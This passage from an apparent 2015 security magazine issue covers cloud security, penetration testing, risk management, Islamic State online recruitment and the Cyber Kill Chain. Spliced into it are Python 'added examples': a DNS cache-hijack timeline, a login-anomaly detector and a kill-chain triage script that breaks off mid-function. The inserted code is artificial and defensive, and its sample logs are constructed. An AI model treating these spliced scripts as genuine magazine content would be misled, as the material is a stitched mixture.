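        now = hour * 3600
        if purge_at is not None and now == purge_at:
            cache.purge(ZONE)
        rdata, _ = cache.resolve(ZONE, now, authority)
        if rdata == ROGUE_NS:
            rogue_hours += 1
        elif first_good_hour is None:
            first_good_hour = hour
    return rogue_hours, first_good_hour


if __name__ == "__main__":
    print("no purge:", hijack_timeline())        # rogue NS served for 24 hours
    print("purge at 1 h:", hijack_timeline(3600))  # rogue NS served for 1 hour
```

The fix at the registrar is invisible to the modelled resolver for the whole 24 hours because the rogue delegation was cached at t=0 with the full TTL; only the purge shortens the window, which is the article's point about asking your DNS provider what it can do in that situation.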
EXECUTIVE BOARDROOM LUNCHEON INVITATION
EXCLUSIVE TO COLLEAGUES
CIO, CISO & CSO THURSDAY 8TH OCTOBER 2015 12.15 PM - 2.15 PM
1 EAGLE STREET, EAGLE STREET PIER BRISBANE, QLD 4000
Security as an enabler for cloud computing James Turner Senior Advisor IBRS
As an IT leader, you understand the potential advantages and benefits that cloud computing could bring to your business. It can enable you to innovate and accelerate business, enhance customer experience, provide employee workplace mobility and increase efficiency. You are also aware that protecting your organisation’s technology assets is one of the biggest challenges in embracing cloud. How can you ensure your cloud environment has rigid security in place be it in public, private or hybrid consumption models? Join James Turner, Senior Advisor, IBRS as he facilitates a discussion on security-business alignment challenges in the mobile cloud era and the safeguards you can put in place to protect your data and applications.
Subject matter experts, Armando Dacal, Regional Vice President, Palo Alto Networks, and Arthur Iliakopoulos, Southern Region Manager, Network and Security, VMware, will also be attending. In this invitation-only executive lunch session, held under Chatham House Rule, we invite you to join your peers in a frank discussion on the challenges and best practices of the journey to cloud. I will be calling you in the next few days to confirm your attendance. Regards,
Chris Cubbage
Director & Executive Editor Australian Security Magazine & ChiefIT Magazine
Kindly RSVP by 6th October to ccubbage@mysecurity.com.au or 0432 743 261
The power of penetration testing in boosting cyber resilience
By Dave Jarvis, National Practice Lead, UXC Saltbush
It seems that every week there is another zero day exploit doing the rounds. Software patching and updates are becoming increasingly frequent, and the rise of mobility is further expanding the business world’s cyber attack surface. Traditional defences can no longer provide the protection needed. Organisations need to become resilient to adapt to these new and emerging threats.
Cyber security resilience involves more than just the prevention of, or response to, a specific attack. It also takes into account the ability to operate during, and to adapt or recover from, such an event. This goal requires cyber risk management, and not one, but many cyber security measures. Traditionally, companies have focused on protection against specific cyber attacks. In today’s digital environment, however, a resilience-based approach to threats is more effective for organisations wanting to adapt to change, reduce exposure to risk, and learn from incidents when they occur.
Due to the growing interconnectedness that comes with new and emerging business technology, improving the resilience of one organisation can be a small step in improving the cyber resilience of all. The same goes for the disparate departments and operations within a single business. Once a unified, company-wide approach to security is established, there will be fewer points of vulnerability to exploit. According to CERT Australia, the government’s national computer emergency response team, modern organisations must layer security defences for their IT systems to reduce the chance of a successful cyber attack.*
* Australian Cyber Crime & Security Survey Report, CERT, 2013.
While the installation of traditional security software, including a firewall, anti-virus, and anti-spyware, remains an essential first step to cyber security, these safeguards alone are no longer enough to adequately protect an organisation from potential threats. Instead, businesses should manage risk with multiple defensive strategies, so that if one layer of defence turns out to be inadequate, another layer can step in to help prevent a full breach. This is known as ‘defence-in-depth’. The multiple defence mechanisms layered across an organisation’s network infrastructure can protect data, networks, and users. A well-designed and implemented defence-in-depth strategy can help system administrators identify internal and external attacks on a computer system or network.
Building organisational resilience to cyber security incidents also requires constant awareness and action. For an organisation to be prepared before an incident occurs, cyber security needs to be part of its risk management, resilience structures, and planning, and staff need to be trained to use good cyber security practices as part of their daily work.
Steps on the path to cyber resilience
There are many ways to protect an organisation’s networks and confidential data at multiple levels. For starters, businesses should make sure they keep their software patches up-to-date and use versions of software that are still supported by such updates. This should include all operating systems and applications, as well as email, database, and web servers. Make sure systems are configured to update automatically where possible.
Given today’s regulatory regime around handling sensitive or private customer information, it is vital that companies develop a backup strategy for critical or sensitive data. A good strategy includes daily backups, an additional weekly or monthly backup, with both offline copies as well as offsite storage of at least the weekly backup media. Companies should make sure to test that they can recover with backup data. A sound backup strategy will ensure access to information in the event of a cyber security incident. Having an offline backup also reduces the impact of ransomware attacks.
Sometimes the simplest solutions are overlooked, yet taking the basic step of creating non-administrator level accounts can do a great deal to help guard against the threat of a security breach. New computers usually have, by default, a single user account with administrator privileges. Split this into two, and the opportunity for an attacker to gain control of a system can be reduced. Use the non-administrator account for all day-to-day activities, in particular for accessing email and web browsing.
The retention of network and computer event logs has become best practice for most industries in which IT plays a vital role. The reason for this is that it can help organisations better detect malicious activity. This is important, as it is still the case that most security breaches go unreported simply because they remain undetected. Implementing sound logging practices improves the chance that malicious behaviour will be detected by highlighting any changes to the normal behaviour of a network, system or user. Logs can show how a cyber security incident came to pass and, therefore, what can be done to prevent similar occurrences in the future.
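The logging paragraph above, like the "log management" item in the BAE Systems feature earlier in this issue, argues that retained logs let you spot changes to the normal behaviour of a user or system. The following is an added example written for this page (not code from the article, UXC Saltbush or BAE Systems) showing the simplest form of that idea: learn, per user, the login hours and source addresses seen during a baseline window, then report later logins that fall outside it. The log lines are constructed; their layout mimics OpenSSH "Accepted" lines, but the regular expression and the host, user and address values are assumptions made for the illustration.

```python
"""Spot departures from 'normal' login behaviour in retained logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed format: ISO timestamp, host, sshd[pid]: Accepted <method> for <user> from <src> port <n>
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Accepted \w+ for (?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse(lines):
    """Yield (timestamp, user, source) for matching lines; ignore everything else."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["user"], m["src"]


def build_baseline(events):
    """Per user: the set of login hours and the set of source addresses observed."""
    hours, sources = defaultdict(set), defaultdict(set)
    for ts, user, src in events:
        hours[user].add(ts.hour)
        sources[user].add(src)
    return hours, sources


def find_anomalies(baseline, events):
    """Return (timestamp, user, reasons) for logins that fall outside the baseline."""
    hours, sources = baseline
    findings = []
    for ts, user, src in events:
        reasons = []
        if user not in hours:
            reasons.append("user never seen in baseline")
        else:
            if ts.hour not in hours[user]:
                reasons.append(f"login at {ts.hour:02d}h outside usual hours")
            if src not in sources[user]:
                reasons.append(f"new source {src}")
        if reasons:
            findings.append((ts.isoformat(), user, "; ".join(reasons)))
    return findings


# Constructed sample data: a 'normal' learning window, then a day under review.
BASELINE_LOG = [
    "2015-06-01T09:02:11 host sshd[101]: Accepted publickey for alice from 10.0.0.5 port 51000",
    "2015-06-01T14:10:33 host sshd[102]: Accepted publickey for alice from 10.0.0.5 port 51010",
    "2015-06-01T08:15:02 host sshd[103]: Accepted publickey for bob from 10.0.0.9 port 52000",
    "2015-06-02T09:05:40 host sshd[104]: Accepted publickey for alice from 10.0.0.5 port 51020",
    "2015-06-02T08:12:55 host sshd[105]: Accepted publickey for bob from 10.0.0.9 port 52010",
]
REVIEW_LOG = [
    "2015-06-08T09:12:01 host sshd[201]: Accepted publickey for alice from 10.0.0.5 port 53000",
    "2015-06-08T03:41:20 host sshd[202]: Accepted password for alice from 198.51.100.23 port 53010",
    "2015-06-08T08:05:00 host sshd[203]: Accepted publickey for bob from 10.0.0.9 port 53020",
    "2015-06-08T08:30:00 host sshd[204]: Accepted publickey for svc_backup from 10.0.0.9 port 53030",
    "2015-06-08T08:31:00 host sshd[205]: Failed password for root from 198.51.100.23 port 53040",
]


def review():
    """Build the baseline from BASELINE_LOG and check REVIEW_LOG against it."""
    baseline = build_baseline(parse(BASELINE_LOG))
    return find_anomalies(baseline, parse(REVIEW_LOG))


if __name__ == "__main__":
    for ts, user, reasons in review():
        print(f"{ts} {user}: {reasons}")
```

A real deployment would learn the baseline over weeks rather than days and would treat an account that has never logged in before as worth a look rather than an alarm in itself; the point here is that none of these questions can be asked unless the earlier logs were kept.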
With mobile devices playing such a large part in business technology, it is important to keep in mind that users with remote access can be targeted by attackers attempting to gain unauthorised access to an internal network. Organisations should have systems in place that can ensure any remote access services are secure. This might involve disabling remote access if it is not needed, or using strong passwords if remote access is required. It is also important to secure all other public-facing services, like a web server, through independent website penetration testing for vulnerabilities.
The importance of penetration testing
Another vital element in establishing cyber security resilience is regular penetration (or ‘pen’) testing. Without pen testing, there is no way of knowing how protected a company is from known threats in the wild. Undergoing pen testing for IT security defences can sometimes be a bit like going on a first date: those involved are a bit nervous that the results might be embarrassing and everyone will find out about it. Nevertheless, pen tests are an essential element of any information security risk assessment. They can provide proof of potential vulnerabilities and help deliver actionable information to support executive decision-making and priorities for investment. It is important to be honest and open about systems and processes when it comes to pen testing, even if this seems counter-intuitive to the natural reaction of self-preservation and protection. Before embarking on a pen test, here are five tips for getting true value from a pen test engagement:
1) Be careful in defining scope
How much should be divulged on a first date? Unless the objectives of a pen test have been carefully considered and defined, it is likely to drift into areas that are not necessarily where the organisation wants it to drift. Two key questions to ask, and answer truthfully, are: “What are our security objectives?” and “What outcomes are we looking for?”
2) Create rules and manage expectations
A pen test engagement will likely involve limited time, tools, and resources. However, most determined hackers can mount a sustained offensive using multiple tools and exploits over a long period of time. As such, it is important to remember that a pen test is a point-in-time activity, so treat it accordingly. While pen testing is not a public spectacle for uploading to YouTube, make sure that relevant third parties, such as hosting providers, are managed so they can be brought in on the act as well. This will help with greater overall insight.
3) Put pen testing into proper context
Given the time restrictions that pen testing is often subject to, different testers can potentially deliver varied results, depending on the different tools and tactics they deploy. Despite this necessary limitation, pen testing is crucial within any risk framework, with the prerequisite of a robust information security framework. Don’t analyse it in isolation; it’s a one-off event just like a date, not a silver bullet or ticket to the altar.
4) Go for quality
Generic self-testing and self-assessment has its place if the risk profile is low enough. However, doing it all alone is no substitute for the real thing. To get value for money, take the precaution of selecting a reputable company with respected accreditations. One approach could be to look for the internationally recognised CREST stamp of approval, which is hard to achieve. It also assures that individual pen test operatives have the necessary skills, and that their employing company has appropriate quality assurance procedures to avoid any slip-ups.
5) Get executive buy-in upfront
Get approval early on. Executives must fully understand the reasons for the exercise and its potential consequences. Too many organisations budget for a pen test and not its outcomes. However, a ‘test and forget’ approach is not a mature option. Paying lip-service by just having regular pen tests is not an inoculation against real attacks. While it may not be possible to fill all potential gaps, accept that some remediation may be required to satisfy a risk profile. Get commitment upfront from management that a treatment plan will be actioned.
‘But you are a woman’
By Kema (Johnson) Rajandran, Correspondent
To some, being in financial crime may seem like an area where you’re deskbound, staring at a computer screen and crunching numbers, but to Michelle Weatherhead, the variety couldn’t be more interesting. As BAE Systems Applied Intelligence head of financial crime ANZ, Michelle manages eight consultants and works primarily with financial institutions across the Asia Pacific. Her role takes her from Australia to Singapore, Malaysia, Indonesia, Thailand or the Philippines at any given time. She says the appeal of working with BAE Systems Applied Intelligence is the ability to work with military grade technology; cutting edge and sophisticated solutions to combat a variety of problems in security – from cyber and fraud to terrorist financing.
“We help our clients detect fraud, comply with AML legislation and combat cyber crime through data, software solutions and professional services,” Michelle says. “I really enjoy the variety of the work. One week, I am doing a presentation in Manila for one-hundred employees and the next week I am working with a client in Singapore helping them to solve a complex and high profile financial crime problem,” she says.
With an abundance of highlights to date, Michelle says she’s been very fortunate in her career so far and shares some memorable and noteworthy parts with us. “In July, BAE Systems Applied Intelligence hosted a women in cyber security and financial crime networking
event. Twenty women from a variety of roles across the industry attended and it generated a lot of positive conversations.” “As a networking evening, we placed an emphasis not on technical learning but on essential career and development skills and shared discussion. It demonstrated what the impact is of a positive mindset and the importance of networking.”
Michelle shared a very personal story at this event about working as a woman in this industry and the difficulties she encountered. “Over the past ten years, I have worked in many countries and it hasn’t always been easy being a woman in this industry.” “Prior to working at BAE Systems Applied Intelligence, I was sent on a financial crime consulting engagement in the Middle East. When I turned up, the head of IT looked at me and said: “I thought you were Michael, but you are a woman!” “Being a little naïve, my innocent response was: “Yes I am Michelle and I am a woman, but I am the best consultant to write your detection rules. Do you want the best consultant to solve your fraud problem or would you like to wait for Michael?” “He waited for Michael, his loss of course…” Ouch. “That was ten years ago and many things are different
now, but it’s still an indication of the struggles we sometimes have in a male-dominated environment.” She never let these moments deter her from what she enjoyed and ultimately to an incredible career. Working with the best and brightest in their field has been very rewarding for her, saying it’s the people that make the job. “I love meeting new people, getting to know them, helping them with issues and becoming lifelong friends. People in this industry are very practical. They get the job done and I appreciate that. It’s also very close knit – the people I met in my first job are still in this industry.” This is one of the reasons why she says collaboration and relationships are so important. “Criminals collaborate; share what they are doing and what works on the dark web. They work together to conduct the crime, so we must do the same thing to combat it.” She also points out that she has two mentors that she uses as a sound board. “A mentor must have your best interests at heart. As a mentee, you must feel safe to share your heart and soul, tell them how you feel and ask for advice. If you can’t be yourself and are scared to ask questions because you’re afraid of being judged, I don’t think it’s the right fit.” “Both of my mentors have seen me at my worst, but they believe in me and guide me. They know my strengths and weaknesses, when to push me, which is important to me.” “It is so important to have a mentor that has your back,
but also knows when to push your boundaries. My mentors encourage me to do things that I would otherwise not do and it always turns out well and feels good afterwards.” But mentorship isn’t everything, and Michelle nominates two other key things in a company that help women climb the ranks: flexible and supportive working conditions and female role models. “Everyone needs someone to look up to, so if you can’t relate to someone in a leadership position it can be hard to encourage yourself and aspire to be one of them. Having a female role model also subconsciously affects others, as it influences their perception of women in power.” With hopes of being a mentor herself, Michelle definitely has a wealth of work and life experience to be a good role model for others and fuel the fire of change in the industry. A wife and mother, who wanted to be a clinical psychologist when she left school and ended up in IT without regret, offers the advice to women starting out to think about what you’re good at and reach out to people in the industry. “Join an association and decide where your strengths lie. If you love being surrounded by people then perhaps a front line fraud investigator may be a good option. If you’re inquisitive and like delving into data then perhaps Cyber Crime Analytics is right for you.” “Those who succeed in this industry are willing to take risks, give things a go and also know when to reach out and collaborate. Big networks rule.”
Security and risk management the next evolution By Dr G Schneider CPP, FAIM, FIS (SA)
In the ever evolving worlds of safety, security, health and emergency management (SSHE), the regulatory and best practice approaches continue to get more onerous and complex. The evolution of specialist areas within this spectrum has been inevitable. We have also seen a process whereby the areas of the SSHE spectrum, sometimes referred to as ‘Hard Risks’ (as opposed to soft risks such as currency risk), have become classed as grudge spend areas. This is especially true for the field of security risk management, which historically has not had the driver of legislative consequence that the safety sector has had.
As organisations or companies grow we have also seen the evolution of a diverse range of organic organisational and corporate structures. These structures have become so diverse that they range from no direct allocation of SSHE activities to mass duplication. There is the ongoing reality that no one model can be applied across different sized organisations that are in different sectors, operating in vastly differing risk environments. However, in many cases organisations are suffering from wastage due to duplication and inefficiency, or intolerably high risk exposure due to lack of resource allocation to ‘hard risk’ management. In many cases organisations are exposed to both of these realities simultaneously, specifically if they have become silo’d based on size, specialisation, management control or geographic complexity. The evolution of organisational silo’ing, whereby hard risk management activities are broken up into various categories as organisations have grown and expanded, is now the common reality, not the exception. Whilst in principle silos for large organisations are a necessity, when it comes to managing hard risk the reality of issues such as duplication of activities, denial of incidents and risk exposure, transfer of blame and lack of authority all become potential issues. These issues are highlighted in the various versions of Workplace Health and Safety legislation, which in most cases does not differentiate between employees and subcontractors and places the responsibility at all levels of an organisation (low level worker right up to senior executive).
The need to move away from the decades old checklist type Hard Risk management approaches utilised by most organisations has reached epidemic proportions. The harsh consequences of security incidents resulting from crime (internal and/or external), fraud and terrorism, including death, business disruption, reputational damage, fines and jail time, are ever-present realities for modern business. The ability to subrogate and de-risk via insurances is no longer as robust as it once was, based on the evolution of non-payment clauses for regulatory non-compliance and other complexities. The ability to de-risk via subcontracting has now been legislatively closed off, and it is now well established legal precedent that all parties (top to bottom) involved in the supply chain are responsible for the identification, mitigation and management of foreseeable risk in a reasonably practicable manner. The complex mapping, rating and referencing systems that proliferate through the hard risk management world have actually reached a point where they are no longer practical tools for risk management but merely academic routine and/or just another additional non-profit, non-performance enhancing function that organisations “Have To” do. In addition, the neglect of hard risk education for most of today’s business leaders, who are often the product
Cyber Security
of academic education which specialises in conventional modelling and has contributed to two of the biggest issues facing organisations from a hard risk perspective today, namely DENIAL and REACTIVE APPROACHES based on ignorance and negligence. It is human nature to avoid systems that either do not show a direct reward, have a consequence which is deemed harsh enough to force compliance or have an effective ‘policing system ’in place to ensure compliance. One only has to look at traffic and road safety and imagine the carnage that would ensue without a set of rules that had harsh enough consequences for non-compliance and no enforcement to apprehend offenders. At various levels I have seen this happening in 100s of organisations we have come across in the last 15 years of business. This is not a unique issue to first world or emerging markets but the focus of hard risk management based on reactivity, sentiment and anecdotal behaviour seems to be the driver. Limitations on the way we view risk continue to be a propagator for reactivity and denial. In many cases this stems from the following core problems: • Consistent viewing of hard risk management as a grudge spend area • Failure to apply proactive budgets based on a dynamic risk based approach • Lack of understanding of actual vs perceived risk from a hard risk perspective • Inefficient use of internal resources • Inefficient use of external expertise • Lack of understanding of internal limitations • Lack of alignment of hard risk management understanding at senior executive as well as lower levels (middle management mayhem) These issues are further complicated by two realities: • The human factor • The use of technology (in terms of limitations or over reliance) While there is no doubt that we have come a long way in improving technology and people management systems we are missing some fundamental principles in the way we make things happen. 
Unfortunately, I have seen this over and over again, where senior executive teams believe an issue has been resolved by creating and attempting to enforce a policy which has no real chance of being embraced at ground level, and which thus often becomes a purely academic exercise in futility. In fact the organisation may make itself more vulnerable by having a policy but not adhering to it. A side effect of policy setting without effective implementation and take-up is that the executive believes hard risks are under control, middle managers are frustrated that there are insufficient resources to implement, and lower levels are never even made aware of the issues and/or solutions. This reality is not new ground, and many executives and managers live with this ongoing problem.

So what can be done about these issues? Here is a brief list of actions and concepts, each of which could be an article in its own right:
• Educate at all levels – understanding hard risk management in context at all levels of an organisation is critical as a starting point. One of the simplest ways to do this is to get everyone talking the same hard risk language and not get too caught up in silo-specific jargon.
• Assess and understand realities in a dynamic way – we tend to want to ignore bad news, and as such it is often hidden from the people that need to know until a crisis occurs. Regular health checks using internal and external resources are critical for more robust decision making.
• Leverage internal resources – often there is internal expertise and knowledge that is not tapped as a result of corporate segregation and legacy, the creation of internal ‘kingdoms’ and, the biggest problem, a lack of internal cross-silo forums and structures to leverage capabilities and sharing. This often comes down to HR-based limitations tied back to KPIs, which sometimes create performance measurements that are silo-specific and ignore the core objectives of the organisation at a macro level.
• Leverage external resources – it is important to know when external help is required and how it should be utilised. Not only are external assessments considered to be more impartial, but they bring fresh eyes to issues that may have been taken for granted as being ‘just the way it is’. The challenge is to act once solutions are identified and not be demotivated by what may appear to be a mountain of issues with no clear start, end and implementation approach.
• Invest in people – the biggest resource for mitigating risk is a ‘switched on’ staff and contractor base. We need to motivate people using both stick and carrot approaches in a balanced manner to gain their ‘buy-in’, otherwise systems will fail and well-intentioned solutions will not go anywhere.
• Incorporate technology – it is important to find the balance between human trust and having sufficient checks and balances. We can’t forget that the battleground of the future is in cyberspace, and organisations face ongoing vulnerability in managing the ‘hard risk’ realities of data and IP protection along with the physical safety and well-being of their staff.

In summary, the core ingredients for implementing a better security risk management approach stem from striving to eliminate denial via education and ongoing assessment, and from implementing a proactive approach which requires more than just paperwork and lip service. In essence the driver should be a move to change, improve and sustain an enhanced level of security and safety culture. By aligning hard risk management to culture and core organisational objectives, it is truly possible to turn risk into opportunity.
Counter-terrorism Feature
Strategies used by Islamic State to recruit on social media
The second part of this article looks at the risks posed by the strategies used by IS outlined in the previous article. Strategies for dealing with the issue are also discussed.
by Robyn Torok, Security Research Institute, Edith Cowan University, Perth, Australia

This article (Part 2) is a continuation of Part 1, which looked at strategies used by Islamic State (IS). Part 1 explored a number of Neuro Linguistic Programming (NLP) strategies used by IS in order to recruit individuals. These strategies included future pacing, anchoring and association/disassociation. This article will focus on the risk posed by these strategies as well as how they can be addressed. As clearly stated in the previous article, NLP strategies are not brainwashing strategies; they aim to persuade and direct an individual. NLP strategies are most effective when an individual is willing to undergo change and hence subjects themselves to these techniques. In the case of IS recruiters, they are continually searching for individuals whom they can influence. While individuals are often unaware of the NLP techniques being used, if they show a propensity toward the ideologies or discourses of IS then the probability of influence and subsequent recruitment increases. Any person in marketing knows that it is ultimately a numbers game. Consider: if IS target one thousand individuals and are successful in only 0.2% of cases (just a small fraction of 1%), then two new recruits have joined Islamic State. While this figure is purely hypothetical, it is aimed at demonstrating that even the most limited level of success poses a risk. As for targeting a large number of individuals, this is not difficult for IS given their large online presence as well as their large number of sympathisers. Furthermore, the risk posed by recruitment is twofold and includes both travelling overseas to join IS and domestic acts of lone wolf terrorism.

The more important question is what can be done about tackling this issue. Firstly, there is a need to better understand the discourses and recruitment process of groups like Islamic State. Not all individuals are equally at risk; those disengaged from society and disaffected are at a higher risk. This goes well beyond disaffected Muslims to include anti-government supporters, hackers, those attracted to violence, individuals who feel betrayed and isolated, and so on. These types of groups also need to be monitored on social media, especially for the presence of recruiters. Secondly, there is a need to challenge these discourses and techniques with counter discourses. Any measures used by the government in dealing with this issue will be turned into propaganda, especially highlighting the grievances of Muslims. Such propaganda can in many cases be pre-empted and addressed. The only issue with this approach is that many times individuals are well isolated from such counter discourses unless they can be identified and targeted early. Once individuals show adequate affiliation, they tend to be redirected to specific pages or sites to better engage and, more importantly, isolate them with the necessary discourses of jihad and martyrdom. Thirdly, there is a need to deal with the broader issue of the success of the Islamic State. The development of an Islamic Caliphate under Sharia Law is the goal of Islamic extremism, and such an ideal is seen as worth joining. Clearly, this complex geopolitical situation must also be addressed, which is beyond the scope of this article. Nonetheless, events on the ground are reflected on social media, with virtually unlimited scope for the production of promotional video material for YouTube. Most importantly, based on the current situation, most political scholars agree that this is going to be a long term process, and at this stage the risk posed by Islamic extremism will not subside in the foreseeable future. Fourthly, the work of the government in dealing with this issue must also be acknowledged.
The tough line drawn sends a clear message that joining or supporting an organisation like Islamic State is not acceptable in Australian society. Airport screening and cancelling passports, challenging the notion of citizenship and enabling new legislation all provide greater scope in tackling the issue. While it is acknowledged that these measures will not always serve as a deterrent, given that many who travel over are prepared for martyrdom, they have significantly increased the chance of stopping those wanting to go over and also serve to prevent further radicalisation of others if these individuals try to return. The final point covers the broader issue of online radicalisation and extremism. While the number of Australians who have joined IS is alarming, what is more concerning is the significant number of online sympathisers of Islamic State. These are individuals who in most cases would not travel overseas or be part of a terrorist plot themselves, yet they play an important role in online radicalisation and recruitment. Essentially, these individuals provide the framework for an online institution in which radicalisation and recruitment take place. In addition, they create a sense of solidarity amongst IS supporters, especially in relation to key events including both IS setbacks and victories in Iraq and Syria. More concerning is the fact that many of these young people are still in the stages of identity formation. While intelligence agencies are working hard to monitor potential threats, the voluminous nature of online material on social media makes it extremely difficult to focus on anything but the most pressing threats. Consequently, it is important for all Australians to watch out for our young people, especially those who spend a great deal of time with them. Whether formal monitoring programs arise or not, there is a need for everyone to watch for signs of withdrawal, radicalisation, intolerance and intent. Most importantly, this is not limited to Muslim populations; it is an Australian issue where those from any background are potential recruits, especially marginalised individuals. Hence a top down approach is also needed. Even highly educated professionals such as doctors and engineers are joining IS to help the State to function. The Muslim community is already playing a critical part in educating young people about the dangers of extremism with bottom up community approaches. What is challenging is that radicalised individuals tend to disengage from mainstream society, and therefore early identification and intervention stemming from those who work closely with them is critical.

In conclusion, the threat posed by IS appears to be a fairly long term threat and includes recruitment to travel overseas or to conduct lone wolf attacks. The Federal Government has already taken a number of very significant and effective measures aimed at preventing individuals from travelling overseas, as well as increased monitoring and surveillance of potential threats. Better understanding of radicalisation processes and a broad approach to watching the risks posed to young Australians from all backgrounds is also needed for long term management of this issue.
Anatomy of a cyber attack
The Cyber Kill Chain is not a new concept, but rethinking how we can use it for IT security may change your defence strategy.
by Adeline Teoh

Modus operandi, or MO, is the Latin term used to describe a ‘method of operation’. It’s handy for police trying to catch a serial killer, looking at clues that establish a pattern of behaviour that will enable them to link the crime to the perpetrator. Knowing how the killer behaves helps investigators form an understanding of the event and may even help to prevent the next murder. It’s a similar story when IT security experts talk about the Cyber Kill Chain. If you have a military or defence background, you may already be familiar with the concept of a kill chain, which is the general structure of any attack: identify target, deploy operatives, decide on and order an attack, destroy the target. A Cyber Kill Chain, a term coined by Lockheed Martin in a 2010 paper, is the standard modus operandi of an IT attacker: the process by which most attacks are carried out, particularly in the extraction of valuable information. It consists of the following steps:
1. Reconnaissance: The attacker researches a target. This is often carried out without entering your IT system.
2. Weaponisation: The attacker works out what method to use that will likely result in establishing a presence inside your system. This may include finding unpatched software that can be a back door into the system or selecting the best type of malware to use.
3. Delivery: The attacker gains entry into your IT system, usually through a malicious URL that may be in an email, app or file.
4. Exploitation: The attacker finds vulnerabilities in your system that will enable his/her malware to compromise the environment.
5. Installation: The attacker establishes malware inside your IT perimeter.
6. Command: The attacker gains control of the environment by creating a communications channel between your system and his/hers.
7. Action: The attacker achieves his/her objectives. Often this is exfiltration of data or system disruption.
While it all sounds pretty menacing, the Cyber Kill Chain is as much an opportunity as it is a threat, says Craig Lawson, Research Director – Security & Privacy at Gartner. “It’s a way to describe the workflow of an adversary. The good thing is it hasn’t changed in 20 years,” he explains.
The weakest link
IT security has a role to play at every stage of the kill chain to weaken the links.
• Policy: Make reconnaissance harder by educating staff about not sharing sensitive information in public.
• Patch hygiene: According to Verizon, 90% of attacks exploit a vulnerability for which a patch had been available for a year or more. Updating software in a timely manner makes it harder for the attacker to get in.
• Detection: How do you define suspicious activity? Consider behavioural analytics, which will also catch internal threat actors. How do you know what parts of your system are compromised? Map suspicious activity to see if there’s a pattern.
• Response: How will you quarantine a compromised part of your system? What’s your process for kicking out an adversary? “Work on your incident response plans,” says Lawson. “The best time to do that is before you have an incident.”
Rethinking IT defence
“When you think about how you want to build your security program, this helps us because it allows us to better align our defences to the way the adversaries are coming at us.” Recent research by Mandiant found that attackers spend an average of 205 days inside the perimeter of their victims’ systems before they are discovered. While this lengthy dwell time certainly looks bad for the IT security team, there is actually an upside, says Lawson. “The adversaries are maintaining a really long dwell time. They’re maintaining persistence on our network for 200-300 days before they get found. What’s the good outcome in that? The good outcome is they probably spent the first 30-60 days figuring out where all the data was before they started exfiltrating it. It’s actually in our favour because it means getting in and then sneaking the data out is actually a long process—we know it takes adversaries days and weeks to do that second part.” This is where organisations can use the Cyber Kill Chain to reconsider their IT defence strategy. If the cycle of exploitation – installation – command is inevitable, if IT security teams accept that they will always have machines compromised with malware, then their focus can shift to the really important work, which is actually preventing adversarial action.
From the start, countering cyber attacks has largely been about preventing threat actors from coming within the perimeter. It’s an electric fence approach that works until it doesn’t. All it takes is for someone within the organisation to open the door, or temporarily disable the electricity on the fence, to let a cyber attacker in. It also assumes that the threat is coming from the outside when it may well come from within. Lawson says instead of focusing our efforts on guarding our system from infiltration and defending against malware on our machines, we should really look at what it means for the bad guys to succeed. “One of the problems we have in IT security is that our definition of defeat is different to our adversary’s definition of victory. We often get bent out of shape if our web server is attacked with a single injection or a laptop gets malware on it but in reality, when you look at how the Cyber Kill Chain works, that’s kind of the start, nothing really bad has happened at that point,” he explains. “Most adversaries are really looking at exfiltrating data. We have this mindset of ‘we need to prevent everything bad from happening across all assets, at all times’, but that’s a flawed response. Winning in the 21st century to me is not about preventing every single attack, it’s about preventing exfiltration. It’s a different mindset in terms of where you spend your time and money.” ‘Cyber Kill Chain’ is a registered trade mark of Lockheed Martin; Gartner uses the term ‘Cyber Attack Chain’ in its formal whitepapers, however its analysts use Cyber Kill Chain as a generic term to describe any IT attack chain.
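As an added example (not code from the article, Gartner or Lockheed Martin), the following Python maps a constructed alert feed with hypothetical alert names and hosts onto the seven kill chain phases listed above, ranks each host by the furthest phase reached and computes its dwell time, so that a host showing a command channel plus an outbound transfer is triaged ahead of a host that merely has malware on it, which is the shift in focus Lawson describes.

```python
"""Kill chain triage over a constructed alert feed (added example).

Alerts are mapped to the article's seven phases; hosts are ranked by the
furthest phase observed, and dwell time is measured from the first event
that places the attacker inside the perimeter to the latest event."""
from collections import defaultdict
from datetime import datetime

# The article's seven phases, in chain order.
PHASES = ["reconnaissance", "weaponisation", "delivery", "exploitation",
          "installation", "command", "action"]
RANK = {phase: i for i, phase in enumerate(PHASES)}
# First phase that means the attacker has a foothold inside the perimeter.
INSIDE = RANK["exploitation"]

# Hypothetical alert names (constructed, not from any real SIEM) -> phase.
ALERT_TO_PHASE = {
    "port_scan_from_external": "reconnaissance",
    "phishing_email_received": "delivery",
    "exploit_attempt": "exploitation",
    "malware_detected": "installation",
    "beacon_to_external_host": "command",
    "large_outbound_transfer": "action",
}

# Constructed sample log lines: "<ISO timestamp> <host> <alert name>".
SAMPLE_LOG = """\
2015-01-05T09:12:00 host-a phishing_email_received
2015-01-05T09:20:00 host-a malware_detected
2015-01-06T10:00:00 host-a beacon_to_external_host
2015-03-10T10:00:00 host-a large_outbound_transfer
2015-02-01T08:00:00 host-b port_scan_from_external
2015-02-14T11:30:00 host-c malware_detected
2015-02-20T11:30:00 host-c beacon_to_external_host
2015-02-20T12:00:00 host-c unknown_alert_type
"""


def parse_event(line):
    """Return (timestamp, host, phase) for one log line, or None when the
    line is malformed or its alert type has no kill chain mapping."""
    parts = line.split()
    if len(parts) != 3:
        return None
    ts, host, alert = parts
    phase = ALERT_TO_PHASE.get(alert)
    if phase is None:
        return None
    return datetime.fromisoformat(ts), host, phase


def chain_progress(log_text):
    """Per host: the set of phases seen, the earliest inside-the-perimeter
    event and the latest event of any phase."""
    hosts = defaultdict(lambda: {"phases": set(), "first_inside": None,
                                 "last_seen": None})
    for line in log_text.splitlines():
        event = parse_event(line)
        if event is None:
            continue
        ts, host, phase = event
        rec = hosts[host]
        rec["phases"].add(phase)
        if RANK[phase] >= INSIDE and (rec["first_inside"] is None
                                      or ts < rec["first_inside"]):
            rec["first_inside"] = ts
        if rec["last_seen"] is None or ts > rec["last_seen"]:
            rec["last_seen"] = ts
    return hosts


def triage(log_text):
    """Rank hosts by the furthest phase reached (ties broken by dwell time).
    'exfiltration' is True only when both a command channel and an action
    phase were seen: the outcome the article says defenders must prevent."""
    rows = []
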